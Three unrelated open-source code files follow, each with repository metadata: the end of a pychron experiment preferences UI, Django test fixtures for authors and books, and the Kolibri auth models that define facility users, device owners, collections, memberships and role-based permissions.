Item("use_uuid_path_name", label="Use UUID Path Names"),
Item(
"save_all_runs",
label="Save All analyses",
tooltip="Save analysis even if run canceled or failed",
),
label="Persist",
show_border=True,
)
pc_grp = Group(
Item(
"use_peak_center_threshold",
label="Use Peak Center Threshold",
tooltip="Only peak center if intensity is greater than the peak center threshold",
),
Item(
"peak_center_threshold",
label="Threshold",
enabled_when="use_peak_center_threshold",
),
Item(
"peak_center_threshold_window",
label="Window",
enabled_when="use_peak_center_threshold",
),
show_border=True,
label="Peak Center",
)
automated_grp = Group(
VGroup(
Item(
"set_integration_time_on_start",
tooltip="Set integration time on start of analysis",
label="Set Integration Time on Start",
),
Item(
"use_equilibration_analysis",
label="Do Equilibration Analysis",
tooltip="Analyze and display equilibration results",
),
Item(
"failed_intensity_count_threshold",
label="N. Failed Intensity",
tooltip="Cancel Experiment if pychron fails to get intensities from "
'mass spectrometer more than "N. Failed Intensity" times',
),
Item(
"ratio_change_detection_enabled",
label="Ratio Change Detection",
tooltip="Cancel experiment if significant changes in configured "
"isotopic ratios are detected. "
'Configured via "setupfiles/ratio_change_detection.yaml"',
),
Item(
"plot_panel_update_period",
label="Regression Update Period",
tooltip="update the isotope regression graph every N counts",
),
pc_grp,
persist_grp,
monitor_grp,
overlap_grp,
),
label="Automated Run",
)
return View(
general_grp,
color_group,
automated_grp,
# notification_grp,
editor_grp,
)
class UserNotifierPreferencesPane(PreferencesPane):
model_factory = UserNotifierPreferences
category = "Experiment"
def traits_view(self):
auth_grp = VGroup(Item("include_log"), show_border=True, label="User Notifier")
v = View(auth_grp)
return v
class ConsolePreferencesPane(BaseConsolePreferencesPane):
model_factory = ConsolePreferences
label = "Experiment"
def traits_view(self):
preview = CustomLabel(
"preview",
size_name="fontsize",
color_name="textcolor",
bgcolor_name="bgcolor",
)
v = View(
VGroup(
HGroup(UItem("fontsize"), UItem("textcolor"), UItem("bgcolor")),
preview,
Item("use_message_colormapping"),
show_border=True,
label=self.label,
)
)
return v
# ============= EOF =============================================
| {
"content_hash": "55087239eec7e00d271c38da4c22b0ec",
"timestamp": "",
"source": "github",
"line_count": 377,
"max_line_length": 104,
"avg_line_length": 33.09814323607427,
"alnum_prop": 0.539669818881231,
"repo_name": "NMGRL/pychron",
"id": "2700f409a4ece812a7d1671eeedfd6f50af7c236",
"size": "13278",
"binary": false,
"copies": "2",
"ref": "refs/heads/main",
"path": "pychron/experiment/tasks/experiment_preferences.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Batchfile",
"bytes": "128"
},
{
"name": "C++",
"bytes": "3706"
},
{
"name": "CSS",
"bytes": "263"
},
{
"name": "Cython",
"bytes": "1692"
},
{
"name": "Fortran",
"bytes": "455875"
},
{
"name": "HTML",
"bytes": "46796"
},
{
"name": "Mako",
"bytes": "412"
},
{
"name": "Processing",
"bytes": "11421"
},
{
"name": "Python",
"bytes": "10773692"
},
{
"name": "Shell",
"bytes": "1003"
}
],
"symlink_target": ""
} |
from fixture import DataSet
class ValidNoRelationsData(DataSet):
class Meta:
django_model = 'app.NoRelations'
class one:
char = "one"
num = 1
class two:
char = "two"
num = 2
class InvalidNoRelationsData(DataSet):
class Meta:
django_model = 'app.NoRelations'
class one:
char = "one"
invalid = 'test'
class two:
char = "two"
some_other = 2
class AuthorData(DataSet):
class Meta:
django_model = 'app.Author'
class frank_herbert:
first_name = "Frank"
last_name = "Herbert"
class guido:
first_name = "Guido"
last_name = "Van rossum"
class BookData(DataSet):
class Meta:
django_model = 'app.Book'
class dune:
title = "Dune"
author = AuthorData.frank_herbert
class python:
title = 'Python'
author = AuthorData.guido
class ReviewerData(DataSet):
class Meta:
django_model = 'app.Reviewer'
class ben:
name = 'ben'
reviewed = [BookData.dune, BookData.python]
| {
"content_hash": "4ab8e5b0038256b8b10f6373dd0d34dc",
"timestamp": "",
"source": "github",
"line_count": 61,
"max_line_length": 51,
"avg_line_length": 18.131147540983605,
"alnum_prop": 0.5650994575045208,
"repo_name": "winhamwr/django-xls-fixtures",
"id": "d513102e6777ec445874dfd26628c5a057e5e4af",
"size": "1106",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "xls_fixtures/test/project/app/fixtures.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "Python",
"bytes": "15137"
}
],
"symlink_target": ""
} |
"""
We have four main abstractions: Users, Collections, Memberships, and Roles.
Users represent people, like students in a school, teachers for a classroom, or volunteers setting up informal
installations. There are two main user types, ``FacilityUser`` and ``DeviceOwner``. A ``FacilityUser`` belongs to a
particular facility, and has permissions only with respect to other data that is associated with that facility. A
``DeviceOwner`` is not associated with a particular facility, and has global permissions for data on the local device.
``FacilityUser`` accounts (like other facility data) may be synced across multiple devices, whereas a DeviceOwner account
is specific to a single installation of Kolibri.
Collections form a hierarchy, with Collections able to belong to other Collections. Collections are subdivided
into several pre-defined levels (``Facility`` > ``Classroom`` > ``LearnerGroup``).
A ``FacilityUser`` (but not a ``DeviceOwner``) can be marked as a member of a ``Collection`` through a ``Membership``
object. Being a member of a Collection also means being a member of all the Collections above that Collection in the
hierarchy.
Another way in which a ``FacilityUser`` can be associated with a particular ``Collection`` is through a ``Role``
object, which grants the user a role with respect to the ``Collection`` and all the collections below it. A ``Role``
object also stores the "kind" of the role (currently, one of "admin" or "coach"), which affects what permissions the
user gains through the ``Role``.
"""
from __future__ import absolute_import, print_function, unicode_literals
import logging as logger
from django.contrib.auth.models import AbstractBaseUser, AnonymousUser
from django.core import validators
from django.core.exceptions import ValidationError
from django.db import models
from django.db.models.query import F
from django.db.utils import IntegrityError
from django.utils import timezone
from django.utils.encoding import python_2_unicode_compatible
from django.utils.translation import ugettext_lazy as _
from kolibri.core.errors import KolibriValidationError
from mptt.models import MPTTModel, TreeForeignKey
from six import string_types
from .constants import collection_kinds, role_kinds
from .errors import (
InvalidRoleKind, UserDoesNotHaveRoleError, UserHasRoleOnlyIndirectlyThroughHierarchyError, UserIsMemberOnlyIndirectlyThroughHierarchyError,
UserIsNotFacilityUser, UserIsNotMemberError
)
from .filters import HierarchyRelationsFilter
from .permissions.auth import (
AnybodyCanCreateIfNoDeviceOwner, AnybodyCanCreateIfNoFacility, CollectionSpecificRoleBasedPermissions,
AnonUserCanReadFacilitiesThatAllowSignUps, IsAdminForOwnFacilityDataset
)
from .permissions.base import BasePermissions, RoleBasedPermissions
from .permissions.general import IsAdminForOwnFacility, IsFromSameFacility, IsOwn, IsSelf
logging = logger.getLogger(__name__)
def _has_permissions_class(obj):
return hasattr(obj, "permissions") and isinstance(obj.permissions, BasePermissions)
@python_2_unicode_compatible
class FacilityDataset(models.Model):
"""
``FacilityDataset`` stores high-level metadata and settings for a particular ``Facility``. It is also the
model that all models storing facility data (data that is associated with a particular facility, and that inherits
from ``AbstractFacilityDataModel``) foreign key onto, to indicate that they belong to this particular ``Facility``.
"""
permissions = IsAdminForOwnFacilityDataset()
description = models.TextField(blank=True)
location = models.CharField(max_length=200, blank=True)
# Facility specific configuration settings
learner_can_edit_username = models.BooleanField(default=False)
learner_can_edit_name = models.BooleanField(default=False)
learner_can_edit_password = models.BooleanField(default=False)
learner_can_sign_up = models.BooleanField(default=False)
learner_can_delete_account = models.BooleanField(default=False)
def __str__(self):
facilities = self.collection_set.filter(kind=collection_kinds.FACILITY)
if facilities:
return "FacilityDataset for {}".format(Facility.objects.get(id=facilities[0].id))
else:
return "FacilityDataset (no associated Facility)"
class AbstractFacilityDataModel(models.Model):
"""
Base model for Kolibri "Facility Data", which is data that is specific to a particular ``Facility``,
such as ``FacilityUsers``, ``Collections``, and other data associated with those users and collections.
"""
dataset = models.ForeignKey(FacilityDataset)
class Meta:
abstract = True
def clean_fields(self, *args, **kwargs):
# ensure that we have, or can infer, a dataset for the model instance
self.ensure_dataset()
super(AbstractFacilityDataModel, self).clean_fields(*args, **kwargs)
def save(self, *args, **kwargs):
# before saving, ensure we have a dataset, and convert any validation errors into integrity errors,
# since by this point the `clean_fields` method should already have prevented this situation from arising
try:
self.ensure_dataset()
except KolibriValidationError as e:
raise IntegrityError(str(e))
super(AbstractFacilityDataModel, self).save(*args, **kwargs)
def ensure_dataset(self):
"""
If no dataset has yet been specified, try to infer it. If a dataset has already been specified, to prevent
inconsistencies, make sure it matches the inferred dataset, otherwise raise a ``KolibriValidationError``.
If we have no dataset and it can't be inferred, we raise a ``KolibriValidationError`` exception as well.
"""
inferred_dataset = self.infer_dataset()
if self.dataset_id:
# make sure currently stored dataset matches inferred dataset, if any
if inferred_dataset and inferred_dataset != self.dataset:
raise KolibriValidationError("This model is not associated with the correct FacilityDataset.")
else:
# use the inferred dataset, if there is one, otherwise throw an error
if inferred_dataset:
self.dataset = inferred_dataset
else:
raise KolibriValidationError("FacilityDataset ('dataset') not provided, and could not be inferred.")
def infer_dataset(self):
"""
This method is used by `ensure_dataset` to "infer" which dataset should be associated with this instance.
It should be overridden in any subclass of ``AbstractFacilityDataModel``, to define a model-specific inference.
"""
raise NotImplementedError("Subclasses of AbstractFacilityDataModel must override the `infer_dataset` method.")
class KolibriAbstractBaseUser(AbstractBaseUser):
"""
Our custom user type, derived from ``AbstractBaseUser`` as described in the Django docs.
Draws liberally from ``django.contrib.auth.AbstractUser``, except we exclude some fields
we don't care about, like email.
This model is an abstract model, and is inherited by both ``FacilityUser`` and ``DeviceOwner``.
"""
class Meta:
abstract = True
USERNAME_FIELD = "username"
username = models.CharField(
_('username'),
max_length=30,
help_text=_('Required. 30 characters or fewer. Letters and digits only'),
validators=[
validators.RegexValidator(
r'^\w+$',
_('Enter a valid username. This value may contain only letters and numbers.')
),
],
)
full_name = models.CharField(_('full name'), max_length=120, blank=True)
date_joined = models.DateTimeField(_('date joined'), default=timezone.now, editable=False)
def get_short_name(self):
return self.full_name.split(' ', 1)[0]
def is_member_of(self, coll):
"""
Determine whether this user is a member of the specified ``Collection``.
:param coll: The ``Collection`` for which we are checking this user's membership.
:return: ``True`` if this user is a member of the specified ``Collection``, otherwise False.
:rtype: bool
"""
raise NotImplementedError("Subclasses of KolibriAbstractBaseUser must override the `is_member_of` method.")
def get_roles_for_user(self, user):
"""
Determine all the roles this user has in relation to the target user, and return a set containing the kinds of roles.
:param user: The target user for which this user has the roles.
:return: The kinds of roles this user has with respect to the target user.
:rtype: set of ``kolibri.auth.constants.role_kinds.*`` strings
"""
raise NotImplementedError("Subclasses of KolibriAbstractBaseUser must override the `get_roles_for_user` method.")
def get_roles_for_collection(self, coll):
"""
Determine all the roles this user has in relation to the specified ``Collection``, and return a set containing the kinds of roles.
:param coll: The target ``Collection`` for which this user has the roles.
:return: The kinds of roles this user has with respect to the specified ``Collection``.
:rtype: set of ``kolibri.auth.constants.role_kinds.*`` strings
"""
raise NotImplementedError("Subclasses of KolibriAbstractBaseUser must override the `get_roles_for_collection` method.")
def has_role_for_user(self, kinds, user):
"""
Determine whether this user has (at least one of) the specified role kind(s) in relation to the specified user.
:param user: The user that is the target of the role (for which this user has the roles).
:param kinds: The kind (or kinds) of role to check for, as a string or iterable.
:type kinds: string from ``kolibri.auth.constants.role_kinds.*``
:return: ``True`` if this user has the specified role kind with respect to the target user, otherwise ``False``.
:rtype: bool
"""
raise NotImplementedError("Subclasses of KolibriAbstractBaseUser must override the `has_role_for_user` method.")
def has_role_for_collection(self, kinds, coll):
"""
Determine whether this user has (at least one of) the specified role kind(s) in relation to the specified ``Collection``.
:param kinds: The kind (or kinds) of role to check for, as a string or iterable.
:type kinds: string from kolibri.auth.constants.role_kinds.*
:param coll: The target ``Collection`` for which this user has the roles.
:return: ``True`` if this user has the specified role kind with respect to the target ``Collection``, otherwise ``False``.
:rtype: bool
"""
raise NotImplementedError("Subclasses of KolibriAbstractBaseUser must override the `has_role_for_collection` method.")
def can_create_instance(self, obj):
"""
Checks whether this user (self) has permission to create a particular model instance (obj).
This method should be overridden by classes that inherit from ``KolibriAbstractBaseUser``.
In general, unless an instance has already been initialized, this method should not be called directly;
instead, it should be preferred to call ``can_create``.
:param obj: An (unsaved) instance of a Django model, to check permissions for.
:return: ``True`` if this user should have permission to create the object, otherwise ``False``.
:rtype: bool
"""
raise NotImplementedError("Subclasses of KolibriAbstractBaseUser must override the `can_create_instance` method.")
def can_create(self, Model, data):
"""
Checks whether this user (self) has permission to create an instance of Model with the specified attributes (data).
This method defers to the ``can_create_instance`` method, and in most cases should not itself be overridden.
:param Model: A subclass of ``django.db.models.Model``
:param data: A ``dict`` of data to be used in creating an instance of the Model
:return: ``True`` if this user should have permission to create an instance of Model with the specified data, else ``False``.
:rtype: bool
"""
try:
instance = Model(**data)
instance.clean_fields()
instance.clean()
except TypeError as e:
logging.error("TypeError while validating model before checking permissions: {}".format(e.args))
return False # if the data provided does not fit the Model, don't continue checking
except ValidationError as e:
logging.error("ValidationError while validating model before checking permissions: {}".format(e.args))
return False # if the data does not validate, don't continue checking
# now that we have an instance, defer to the permission-checking method that works with instances
return self.can_create_instance(instance)
def can_read(self, obj):
"""
Checks whether this user (self) has permission to read a particular model instance (obj).
This method should be overridden by classes that inherit from ``KolibriAbstractBaseUser``.
:param obj: An instance of a Django model, to check permissions for.
:return: ``True`` if this user should have permission to read the object, otherwise ``False``.
:rtype: bool
"""
raise NotImplementedError("Subclasses of KolibriAbstractBaseUser must override the `can_read` method.")
def can_update(self, obj):
"""
Checks whether this user (self) has permission to update a particular model instance (obj).
This method should be overridden by classes that inherit from KolibriAbstractBaseUser.
:param obj: An instance of a Django model, to check permissions for.
:return: ``True`` if this user should have permission to update the object, otherwise ``False``.
:rtype: bool
"""
raise NotImplementedError("Subclasses of KolibriAbstractBaseUser must override the `can_update` method.")
def can_delete(self, obj):
"""
Checks whether this user (self) has permission to delete a particular model instance (obj).
This method should be overridden by classes that inherit from KolibriAbstractBaseUser.
:param obj: An instance of a Django model, to check permissions for.
:return: ``True`` if this user should have permission to delete the object, otherwise ``False``.
:rtype: bool
"""
raise NotImplementedError("Subclasses of KolibriAbstractBaseUser must override the `can_delete` method.")
def get_roles_for(self, obj):
"""
Helper function that defers to ``get_roles_for_user`` or ``get_roles_for_collection`` based on the type of object passed in.
"""
if isinstance(obj, KolibriAbstractBaseUser):
return self.get_roles_for_user(obj)
elif isinstance(obj, Collection):
return self.get_roles_for_collection(obj)
else:
raise ValueError("The `obj` argument to `get_roles_for` must be either an instance of KolibriAbstractBaseUser or Collection.")
def has_role_for(self, kinds, obj):
"""
Helper function that defers to ``has_role_for_user`` or ``has_role_for_collection`` based on the type of object passed in.
"""
if isinstance(obj, KolibriAbstractBaseUser):
return self.has_role_for_user(kinds, obj)
elif isinstance(obj, Collection):
return self.has_role_for_collection(kinds, obj)
else:
raise ValueError("The `obj` argument to `has_role_for` must be either an instance of KolibriAbstractBaseUser or Collection.")
def filter_readable(self, queryset):
"""
Filters a queryset down to only the elements that this user should have permission to read.
:param queryset: A ``QuerySet`` instance that the filtering should be applied to.
:return: Filtered ``QuerySet`` including only elements that are readable by this user.
"""
raise NotImplementedError("Subclasses of KolibriAbstractBaseUser must override the `can_delete` method.")
class KolibriAnonymousUser(AnonymousUser, KolibriAbstractBaseUser):
"""
Custom anonymous user that also exposes the same interface as KolibriAbstractBaseUser, for consistency.
"""
class Meta:
abstract = True
def is_member_of(self, coll):
return False
def get_roles_for_user(self, user):
return set([])
def get_roles_for_collection(self, coll):
return set([])
def has_role_for_user(self, kinds, user):
return False
def has_role_for_collection(self, kinds, coll):
return False
def can_create_instance(self, obj):
# check the object permissions, if available, just in case permissions are granted to anon users
if _has_permissions_class(obj):
return obj.permissions.user_can_create_object(self, obj)
else:
return False
def can_read(self, obj):
# check the object permissions, if available, just in case permissions are granted to anon users
if _has_permissions_class(obj):
return obj.permissions.user_can_read_object(self, obj)
else:
return False
def can_update(self, obj):
# check the object permissions, if available, just in case permissions are granted to anon users
if _has_permissions_class(obj):
return obj.permissions.user_can_update_object(self, obj)
else:
return False
def can_delete(self, obj):
# check the object permissions, if available, just in case permissions are granted to anon users
if _has_permissions_class(obj):
return obj.permissions.user_can_delete_object(self, obj)
else:
return False
def filter_readable(self, queryset):
# check the object permissions, if available, just in case permissions are granted to anon users
if _has_permissions_class(queryset.model):
return queryset.model.permissions.readable_by_user_filter(self, queryset).distinct()
else:
return queryset.none()
@python_2_unicode_compatible
class FacilityUser(KolibriAbstractBaseUser, AbstractFacilityDataModel):
"""
``FacilityUser`` is the fundamental object of the auth app. These users represent the main users, and can be associated
with a hierarchy of ``Collections`` through ``Memberships`` and ``Roles``, which then serve to help determine permissions.
"""
permissions = (
IsSelf() | # FacilityUser can be read and written by itself
IsAdminForOwnFacility() | # FacilityUser can be read and written by a facility admin
RoleBasedPermissions( # FacilityUser can be read by admin or coach, and updated by admin, but not created/deleted by non-facility admin
target_field=".",
can_be_created_by=(), # we can't check creation permissions by role, as user doesn't exist yet
can_be_read_by=(role_kinds.ADMIN, role_kinds.COACH),
can_be_updated_by=(role_kinds.ADMIN,),
can_be_deleted_by=(), # don't want a classroom admin deleting a user completely, just removing them from the class
)
)
facility = models.ForeignKey("Facility")
# FacilityUsers can't access the Django admin interface
is_staff = False
is_superuser = False
class Meta:
unique_together = (("username", "facility"),)
def infer_dataset(self):
return self.facility.dataset
def is_member_of(self, coll):
if self.dataset_id != coll.dataset_id:
return False
if coll.kind == collection_kinds.FACILITY:
return True # FacilityUser is always a member of her own facility
return HierarchyRelationsFilter(FacilityUser.objects.all()).filter_by_hierarchy(
target_user=F("id"),
ancestor_collection=coll.id,
).filter(id=self.id).exists()
def get_roles_for_user(self, user):
if not hasattr(user, "dataset_id") or self.dataset_id != user.dataset_id:
return set([])
role_instances = HierarchyRelationsFilter(Role).filter_by_hierarchy(
ancestor_collection=F("collection"),
source_user=F("user"),
target_user=user,
).filter(user=self)
return set([instance["kind"] for instance in role_instances.values("kind").distinct()])
def get_roles_for_collection(self, coll):
if self.dataset_id != coll.dataset_id:
return set([])
role_instances = HierarchyRelationsFilter(Role).filter_by_hierarchy(
ancestor_collection=F("collection"),
source_user=F("user"),
descendant_collection=coll,
).filter(user=self)
return set([instance["kind"] for instance in role_instances.values("kind").distinct()])
def has_role_for_user(self, kinds, user):
if not kinds:
return False
if not hasattr(user, "dataset_id") or self.dataset_id != user.dataset_id:
return False
return HierarchyRelationsFilter(Role).filter_by_hierarchy(
ancestor_collection=F("collection"),
source_user=F("user"),
role_kind=kinds,
target_user=user,
).filter(user=self).exists()
def has_role_for_collection(self, kinds, coll):
if not kinds:
return False
if self.dataset_id != coll.dataset_id:
return False
return HierarchyRelationsFilter(Role).filter_by_hierarchy(
ancestor_collection=F("collection"),
source_user=F("user"),
role_kind=kinds,
descendant_collection=coll,
).filter(user=self).exists()
def can_create_instance(self, obj):
# a FacilityUser's permissions are determined through the object's permission class
if _has_permissions_class(obj):
return obj.permissions.user_can_create_object(self, obj)
else:
return False
def can_read(self, obj):
# a FacilityUser's permissions are determined through the object's permission class
if _has_permissions_class(obj):
return obj.permissions.user_can_read_object(self, obj)
else:
return False
def can_update(self, obj):
# a FacilityUser's permissions are determined through the object's permission class
if _has_permissions_class(obj):
return obj.permissions.user_can_update_object(self, obj)
else:
return False
def can_delete(self, obj):
# a FacilityUser's permissions are determined through the object's permission class
if _has_permissions_class(obj):
return obj.permissions.user_can_delete_object(self, obj)
else:
return False
def filter_readable(self, queryset):
if _has_permissions_class(queryset.model):
return queryset.model.permissions.readable_by_user_filter(self, queryset).distinct()
else:
return queryset.none()
def __str__(self):
return '"{user}"@"{facility}"'.format(user=self.full_name or self.username, facility=self.facility)
class DeviceOwnerManager(models.Manager):
def create_superuser(self, username, password, **extra_fields):
if not username:
raise ValueError('The given username must be set')
user = DeviceOwner(username=username)
user.set_password(password)
user.save()
return user
@python_2_unicode_compatible
class DeviceOwner(KolibriAbstractBaseUser):
"""
When a user first installs Kolibri on a device, they will be prompted to create a ``DeviceOwner``, a special kind of
user which is associated with that device only, and who must give permission to make broad changes to the Kolibri
installation on that device (such as creating a ``Facility``, or changing configuration settings).
Actions not relating to user data but specifically to a device -- like upgrading Kolibri, changing whether the
device is a Classroom Server or Classroom Client, or determining manually which data should be synced -- must be
performed by a ``DeviceOwner``.
A ``DeviceOwner`` is a superuser, and has full access to do anything she wants with data on the device.
"""
permissions = AnybodyCanCreateIfNoDeviceOwner()
objects = DeviceOwnerManager()
# DeviceOwners can access the Django admin interface
is_staff = True
is_superuser = True
def is_member_of(self, coll):
return False # a DeviceOwner is not a member of any Collection
def get_roles_for_user(self, user):
return set([role_kinds.ADMIN]) # a DeviceOwner has admin role for all users on the device
def get_roles_for_collection(self, coll):
return set([role_kinds.ADMIN]) # a DeviceOwner has admin role for all collections on the device
def has_role_for_user(self, kinds, user):
if isinstance(kinds, string_types):
kinds = [kinds]
return role_kinds.ADMIN in kinds # a DeviceOwner has admin role for all users on the device
def has_role_for_collection(self, kinds, coll):
if isinstance(kinds, string_types):
kinds = [kinds]
return role_kinds.ADMIN in kinds # a DeviceOwner has admin role for all collections on the device
def can_create_instance(self, obj):
# DeviceOwners are superusers, and can do anything
return True
def can_read(self, obj):
# DeviceOwners are superusers, and can do anything
return True
def can_update(self, obj):
# DeviceOwners are superusers, and can do anything
return True
def can_delete(self, obj):
# DeviceOwners are superusers, and can do anything
return True
def filter_readable(self, queryset):
return queryset
def __str__(self):
return self.full_name or self.username
def has_perm(self, perm, obj=None):
# ensure the DeviceOwner has full access to the Django admin
return True
def has_perms(self, perm_list, obj=None):
# ensure the DeviceOwner has full access to the Django admin
return True
def has_module_perms(self, app_label):
# ensure the DeviceOwner has full access to the Django admin
return True
@python_2_unicode_compatible
class Collection(MPTTModel, AbstractFacilityDataModel):
"""
``Collections`` are hierarchical groups of ``FacilityUsers``, used for grouping users and making decisions about permissions.
``FacilityUsers`` can have roles for one or more ``Collections``, by way of obtaining ``Roles`` associated with those ``Collections``.
``Collections`` can belong to other ``Collections``, and user membership in a ``Collection`` is conferred through ``Memberships``.
``Collections`` are subdivided into several pre-defined levels.
"""
# Collection can be read by anybody from the facility; writing is only allowed by an admin for the collection.
# Furthermore, no FacilityUser can create or delete a Facility. Permission to create a collection is governed
# by roles in relation to the new collection's parent collection (see CollectionSpecificRoleBasedPermissions).
permissions = (
IsFromSameFacility(read_only=True) |
CollectionSpecificRoleBasedPermissions() |
AnybodyCanCreateIfNoFacility() |
AnonUserCanReadFacilitiesThatAllowSignUps()
)
_KIND = None # Should be overridden in subclasses to specify what "kind" they are
name = models.CharField(max_length=100)
parent = TreeForeignKey('self', null=True, blank=True, related_name='children', db_index=True)
kind = models.CharField(max_length=20, choices=collection_kinds.choices)
def clean_fields(self, *args, **kwargs):
self._ensure_kind()
super(Collection, self).clean_fields(*args, **kwargs)
def save(self, *args, **kwargs):
self._ensure_kind()
super(Collection, self).save(*args, **kwargs)
def _ensure_kind(self):
"""
Make sure the "kind" is set correctly on the model, corresponding to the appropriate subclass of ``Collection``.
"""
if self._KIND:
self.kind = self._KIND
def get_members(self):
if self.kind == collection_kinds.FACILITY:
return FacilityUser.objects.filter(dataset=self.dataset) # FacilityUser is always a member of her own facility
return HierarchyRelationsFilter(FacilityUser).filter_by_hierarchy(
target_user=F("id"),
ancestor_collection=self,
)
def add_role(self, user, role_kind):
"""
Create a ``Role`` associating the provided user with this collection, with the specified kind of role.
If the Role object already exists, just return that, without changing anything.
:param user: The ``FacilityUser`` to associate with this ``Collection``.
:param role_kind: The kind of role to give the user with respect to this ``Collection``.
:return: The ``Role`` object (possibly new) that associates the user with the ``Collection``.
"""
# ensure the specified role kind is valid
if role_kind not in (kind[0] for kind in role_kinds.choices):
raise InvalidRoleKind("'{role_kind}' is not a valid role kind.".format(role_kind=role_kind))
# ensure the provided user is a FacilityUser
if not isinstance(user, FacilityUser):
raise UserIsNotFacilityUser("You can only add roles for FacilityUsers.")
# create the necessary role, if it doesn't already exist
role, created = Role.objects.get_or_create(user=user, collection=self, kind=role_kind)
return role
def remove_role(self, user, role_kind):
"""
Remove any ``Role`` objects associating the provided user with this ``Collection``, with the specified kind of role.
:param user: The ``FacilityUser`` to dissociate from this ``Collection`` (for the specific role kind).
:param role_kind: The kind of role to remove from the user with respect to this ``Collection``.
"""
# ensure the specified role kind is valid
if role_kind not in (kind[0] for kind in role_kinds.choices):
raise InvalidRoleKind("'{role_kind}' is not a valid role kind.".format(role_kind=role_kind))
# ensure the provided user is a FacilityUser
if not isinstance(user, FacilityUser):
raise UserIsNotFacilityUser("You can only remove roles for FacilityUsers.")
# make sure the user has the role to begin with
if not user.has_role_for_collection(role_kind, self):
raise UserDoesNotHaveRoleError("User does not have this role for this collection.")
# delete the appropriate role, if it exists
results = Role.objects.filter(user=user, collection=self, kind=role_kind).delete()
# if no Roles were deleted, the user's role must have been indirect (via the collection hierarchy)
if results[0] == 0:
raise UserHasRoleOnlyIndirectlyThroughHierarchyError(
"Role cannot be removed, as user has it only indirectly, through the collection hierarchy.")
def add_member(self, user):
"""
Create a ``Membership`` associating the provided user with this ``Collection``.
If the ``Membership`` object already exists, just return that, without changing anything.
:param user: The ``FacilityUser`` to add to this ``Collection``.
:return: The ``Membership`` object (possibly new) that associates the user with the ``Collection``.
"""
# ensure the provided user is a FacilityUser
if not isinstance(user, FacilityUser):
raise UserIsNotFacilityUser("You can only add memberships for FacilityUsers.")
# create the necessary membership, if it doesn't already exist
membership, created = Membership.objects.get_or_create(user=user, collection=self)
return membership
def remove_member(self, user):
"""
Remove any ``Membership`` objects associating the provided user with this ``Collection``.
:param user: The ``FacilityUser`` to remove from this ``Collection``.
:return: ``True`` if a ``Membership`` was removed, ``False`` if there was no matching ``Membership`` to remove.
"""
# ensure the provided user is a FacilityUser
if not isinstance(user, FacilityUser):
raise UserIsNotFacilityUser("You can only remove memberships for FacilityUsers.")
if not user.is_member_of(self):
raise UserIsNotMemberError("The user is not a member of the collection, and cannot be removed.")
# delete the appropriate membership, if it exists
results = Membership.objects.filter(user=user, collection=self).delete()
# if no Memberships were deleted, the user's membership must have been indirect (via the collection hierarchy)
if results[0] == 0:
raise UserIsMemberOnlyIndirectlyThroughHierarchyError(
"Membership cannot be removed, as user is a member only indirectly, through the collection hierarchy.")
def infer_dataset(self):
if self.parent:
# subcollections inherit dataset from root of their tree
# (we can't call `get_root` directly on self, as it won't work if self hasn't yet been saved)
return self.parent.get_root().dataset
else:
return None # the root node (i.e. Facility) must be explicitly tied to a dataset
def __str__(self):
return '"{name}" ({kind})'.format(name=self.name, kind=self.kind)
@python_2_unicode_compatible
class Membership(AbstractFacilityDataModel):
"""
A ``FacilityUser`` can be marked as a member of a ``Collection`` through a ``Membership`` object. Being a member of a
``Collection`` also means being a member of all the ``Collections`` above that ``Collection`` in the tree (i.e. if you
are a member of a ``LearnerGroup``, you are also a member of the ``Classroom`` that contains that ``LearnerGroup``,
and of the ``Facility`` that contains that ``Classroom``).
"""
permissions = (
IsOwn(read_only=True) | # users can read their own Memberships
RoleBasedPermissions( # Memberships can be read and written by admins, and read by coaches, for the member user
target_field="user",
can_be_created_by=(role_kinds.ADMIN,),
can_be_read_by=(role_kinds.ADMIN, role_kinds.COACH),
can_be_updated_by=(), # Membership objects shouldn't be updated; they should be deleted and recreated as needed
can_be_deleted_by=(role_kinds.ADMIN,),
)
)
user = models.ForeignKey('FacilityUser', blank=False, null=False)
# Note: "It's recommended you use mptt.fields.TreeForeignKey wherever you have a foreign key to an MPTT model.
# https://django-mptt.github.io/django-mptt/models.html#treeforeignkey-treeonetoonefield-treemanytomanyfield
collection = TreeForeignKey("Collection")
class Meta:
unique_together = (("user", "collection"),)
def infer_dataset(self):
user_dataset = self.user.dataset
collection_dataset = self.collection.dataset
if user_dataset != collection_dataset:
raise KolibriValidationError("Collection and user for a Membership object must be in same dataset.")
return user_dataset
def __str__(self):
return "{user}'s membership in {collection}".format(user=self.user, collection=self.collection)
@python_2_unicode_compatible
class Role(AbstractFacilityDataModel):
"""
A ``FacilityUser`` can have a role for a particular ``Collection`` through a ``Role`` object, which also stores
the "kind" of the ``Role`` (currently, one of "admin" or "coach"). Having a role for a ``Collection`` also
implies having that role for all sub-collections of that ``Collection`` (i.e. all the ``Collections`` below it
in the tree).
"""
permissions = (
IsOwn(read_only=True) | # users can read their own Roles
RoleBasedPermissions( # Memberships can be read and written by admins, and read by coaches, for the role collection
target_field="collection",
can_be_created_by=(role_kinds.ADMIN,),
can_be_read_by=(role_kinds.ADMIN, role_kinds.COACH),
can_be_updated_by=(), # Role objects shouldn't be updated; they should be deleted and recreated as needed
can_be_deleted_by=(role_kinds.ADMIN,),
)
)
user = models.ForeignKey('FacilityUser', related_name="roles", blank=False, null=False)
# Note: "It's recommended you use mptt.fields.TreeForeignKey wherever you have a foreign key to an MPTT model.
# https://django-mptt.github.io/django-mptt/models.html#treeforeignkey-treeonetoonefield-treemanytomanyfield
collection = TreeForeignKey("Collection")
kind = models.CharField(max_length=20, choices=role_kinds.choices)
class Meta:
unique_together = (("user", "collection", "kind"),)
def infer_dataset(self):
user_dataset = self.user.dataset
collection_dataset = self.collection.dataset
if user_dataset != collection_dataset:
raise KolibriValidationError("The collection and user for a Role object must be in the same dataset.")
return user_dataset
def __str__(self):
return "{user}'s {kind} role for {collection}".format(user=self.user, kind=self.kind, collection=self.collection)
class CollectionProxyManager(models.Manager):
def get_queryset(self):
return super(CollectionProxyManager, self).get_queryset().filter(kind=self.model._KIND)
@python_2_unicode_compatible
class Facility(Collection):
_KIND = collection_kinds.FACILITY
objects = CollectionProxyManager()
class Meta:
proxy = True
@classmethod
def get_default_facility(cls):
# temporary approach to a default facility; later, we can make this more refined
return cls.objects.all().first()
def save(self, *args, **kwargs):
if self.parent:
raise IntegrityError("Facility must be the root of a collection tree, and cannot have a parent.")
